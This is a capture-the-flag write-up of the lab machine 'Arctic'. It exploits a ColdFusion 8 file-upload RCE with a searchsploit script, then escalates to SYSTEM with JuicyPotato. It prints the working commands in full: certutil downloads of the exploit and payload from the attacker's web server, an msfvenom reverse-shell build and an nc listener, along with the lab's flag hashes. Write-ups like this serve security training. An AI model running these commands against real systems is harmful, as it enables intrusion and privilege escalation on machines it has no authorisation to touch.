Arctic

1/19/24

easy

Enum

sudo nmap -sC -sV -v -o nmap -T4 10.10.10.11  -Pn

Open ports 135, 8500, 49154

‣

NMAP Output

From that output 8500 stands out, visiting on a web browser

Interesting directories, exploring each

‣

CFIDE/

‣

cfdocs/

Looks like config files for something, googling directory names:

CFIDE + port 8500 indicates ColdFusion. Looks like a server management solution

Lets try to find a panel login or something.

CIFDE/

Parent ..                                              dir   01/20/24 04:31 μμ
Application.cfm                                       1151   03/18/08 11:06 πμ
adminapi/                                              dir   03/22/17 08:53 μμ
administrator/                                         dir   03/22/17 08:55 μμ
classes/                                               dir   03/22/17 08:52 μμ
componentutils/                                        dir   03/22/17 08:52 μμ
debug/                                                 dir   03/22/17 08:52 μμ
images/                                                dir   03/22/17 08:52 μμ
install.cfm                                          12077   03/18/08 11:06 πμ
multiservermonitor-access-policy.xml                   278   03/18/08 11:07 πμ
probe.cfm                                            30778   03/18/08 11:06 πμ
scripts/                                               dir   03/22/17 08:52 μμ
shell.jsp                                             1499   01/20/24 04:41 μμ
wizards/                                               dir   03/22/17 08:52 μμ

CFIDE/administrator/ is a login panel

We also see the version of coldfusion , ColdFusion 8.

Exploit Analysis

Low hanging CVE?

searchsploit ColdFusion 8

‣

Output

Adobe ColdFusion 8 - Remote Command Execution (RCE)                                                      | cfm/webapps/50057.py

Looks promising, lets try.

searchsploit -m 50057

‣

50057.py

Reading through the code, the main portions are

Generating a jsp payload (with msfvenom in this case)
Posting the payload to directory:

/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/

Requesting the newly uploaded payload to execute.

Lets see if it’s as easy as running it.

Exploitation

python3 50057.py

Simple as that !

net users

User accounts for \\ARCTIC

-------------------------------------------------------------------------------
Administrator            Guest                    tolis                    
The command completed successfully.

Looks like we are already user level, lets grab that flag.

862cff073b113be4685a3f095694f818

Alright, how can we priv esc?

‣

whoami /priv

‣

whoami /groups

Looks like we are in some privileged groups & have some user pivs enabled.

We have SeImpersonatePrivilege which is usually a good indicator of juicypotato working.

Privilege Escalation

Jorge Lajara Website

Personal Blog

jlajara.gitlab.io

We need the CLSID for JP to work. Lets find out what version of windows we are on.

systeminfo

‣

systeminfo

We are on Microsoft Windows Server 2008 R2 we can lookup the CLSIDs for this particular OS here:

ohpe.it

Lets grab the binary and transfer it to the machine

Embed GitHub

On our attack box

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Host on webserver

python3 -m http.server 80

On target machine

certutil -urlcache -f http://10.10.14.43/JuicyPotato.exe JP.exe

Now we need something for JuicyPotato to launch with higher privs, we can generate an msfvenom payload for this.

On attack box

msfvenom -p windows/x64/shell_reverse_tcp LPORT=42069 -f exe -o sh.exe LHOST=10.10.14.43

Now transfer the same way

On target machine

certutil -urlcache -f http://10.10.14.43/sh.exe sh.exe

Start by listening on your attack box 💬

nc -lvnp 42069

Now, lets launch JP.exe with the following args:

JP.exe -l 1337 -p C:\Users\tolis\Documents\sh.exe -t * -c {C49E32C6-BC8B-11d2-85D4-00105A1F8304}

We got a shell back!

Are we NT \ Authority ? 🤔

AYYYYY 🥳

489bb32a998da6937df67d6b27524d50